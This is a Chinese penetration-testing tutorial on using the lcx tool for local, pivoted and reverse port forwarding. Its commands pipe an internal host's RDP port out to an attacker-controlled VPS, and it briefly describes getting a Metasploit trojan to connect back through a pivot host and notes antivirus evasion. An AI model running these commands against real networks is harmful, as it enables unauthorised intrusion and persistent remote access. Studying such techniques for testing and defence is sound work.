lcx端口转发(详解)

简介: 在实际渗透过程中,我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口等等。

一、Lcx的运行环境

在实际渗透过程中,我们想在本机上通过浏览器或者其他客户端软件访问目标机器内部网络中所开放的端口,比如内网的3389端口等等。


适用端口转发的网络环境有以下几种:

1、服务器处于内网,可以出网。

2、服务器处于外网,可以出网,但是服务器安装了防火墙来拒绝敏感端口的连接。

3、服务器处于内网,对外只开放了80端口,并且服务器不能出网。

对于以上三种情况,lcx可以突破1和2二种,但是第3种就没有办法了,因为lcx在使用中需要访问外部网络



二、本地端口转发(防火墙限制端口时)


lcx.exe –tran 666 127.0.0.1 3389     #将3389端口转发到本地666端口



②利用B跳板把C主机端口带出来


lcx.exe -tran <B主机端口> <C主机ip> <C主机端口>    #连接B主机的端口就相当于连接了C主机端口



三、lcx反向端口转发

①转发目标本机端口

目标主机执行:


lcx.exe –slave 139.XXX.XX.113 9000 127.0.0.1 3389    #将目标机器3389端口的所有流量,都转发给公网VPS的9000端口

vps执行:


lcx.exe –listen 9000 5555    #监听本地9000端口,将收到的流量转发到本机的5555端口上

然后用mstsc登陆139.XXX.XX.113:5555或者在VPS上用mstsc登陆127.0.0.1:5555。即可访问右侧内部网络中10.48.128.25服务器的3389端口。


②通过B跳板转发内网C端口

B主机执行:


lcx.exe –slave vps的ip 9000 C主机ip 3389    #将内网C机器3389端口的所有流量,都通过B主机转发给公网VPS的9000端口

vps执行:


lcx.exe –listen 9000 5555    #监听本地9000端口,将收到的流量转发到本机的5555端口上

然后连接vps本地5555端口就相当于连接到了内网C主机的3389端口


四、通过端口转发让内网主机上线:

场景:(B主机可以出网,内网主机只能访问B,不能出网,所以通过B跳板让内网主机上线)

B主机用lcx执行,这里用的portmap相当于lcx的-tran:

然后MSF生成木马(lhost=B跳板ip,lport=B跳板端口)

执行payload就能上线:


五、lcx的缺点

Lcx工具实现的是一对一的端口转发,如果想访问右侧网络中列出的所有端口,就必须一次次的重复lcx的转发过程,效率相当低下。而且服务器都是有装有杀毒软件的,即使有做免杀也不能保证绕过所有的杀毒。

目录
相关文章
|
5月前
|
弹性计算 应用服务中间件 Linux
阿里云服务器开放端口完整图文教程
笔者近期开发完成的服务端程序部署在阿里云的ECS云服务器上面,一些应用程序配置文件需要设置监听的端口(如Tomcat的8080、443端口等),虽然通过CentOs 7系统的的「防火墙」开放了对应的端口号,任然无法访问端口号对应的应用程序,后面了解到原来还需要设置云服务器的「安全组规则」,开放相应的端口权限,服务端的接口才能真正开放。
739 1
阿里云服务器开放端口完整图文教程
|
5月前
|
弹性计算 运维 数据安全/隐私保护
云服务器 ECS产品使用问题之如何更改服务器的IP地址或端口号
云服务器ECS(Elastic Compute Service)是各大云服务商阿里云提供的一种基础云计算服务,它允许用户租用云端计算资源来部署和运行各种应用程序。以下是一个关于如何使用ECS产品的综合指南。
|
4月前
|
缓存 NoSQL 网络安全
【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
【Azure Redis 缓存】使用开源工具redis-copy时遇见6379端口无法连接到Redis服务器的问题
|
5月前
|
网络协议 Linux Unix
面试官:服务器最大可以创建多少个tcp连接以及端口并解释下你对文件句柄的理解
面试官:服务器最大可以创建多少个tcp连接以及端口并解释下你对文件句柄的理解
149 0
面试官:服务器最大可以创建多少个tcp连接以及端口并解释下你对文件句柄的理解
|
4月前
|
网络协议
【qt】TCP的监听 (设置服务器IP地址和端口号)
【qt】TCP的监听 (设置服务器IP地址和端口号)
260 0
|
5月前
|
存储 安全 网络安全
服务器设置了端口映射之后外网还是访问不了服务器
服务器设置了端口映射之后外网还是访问不了服务器
若依修改,若依部署在本地运行时的注意事项,后端连接了服务器,本地的vue.config.js要先改成localhost:端口号与后端匹配,部署的时候再改公网IP:端口号
若依修改,若依部署在本地运行时的注意事项,后端连接了服务器,本地的vue.config.js要先改成localhost:端口号与后端匹配,部署的时候再改公网IP:端口号
|
6月前
|
Java Android开发
Java Socket编程示例:服务器开启在8080端口监听,接收客户端连接并打印消息。
【6月更文挑战第23天】 Java Socket编程示例:服务器开启在8080端口监听,接收客户端连接并打印消息。客户端连接服务器,发送&quot;Hello, Server!&quot;后关闭。注意Android中需避免主线程进行网络操作。
110 4
下一篇
DataWorks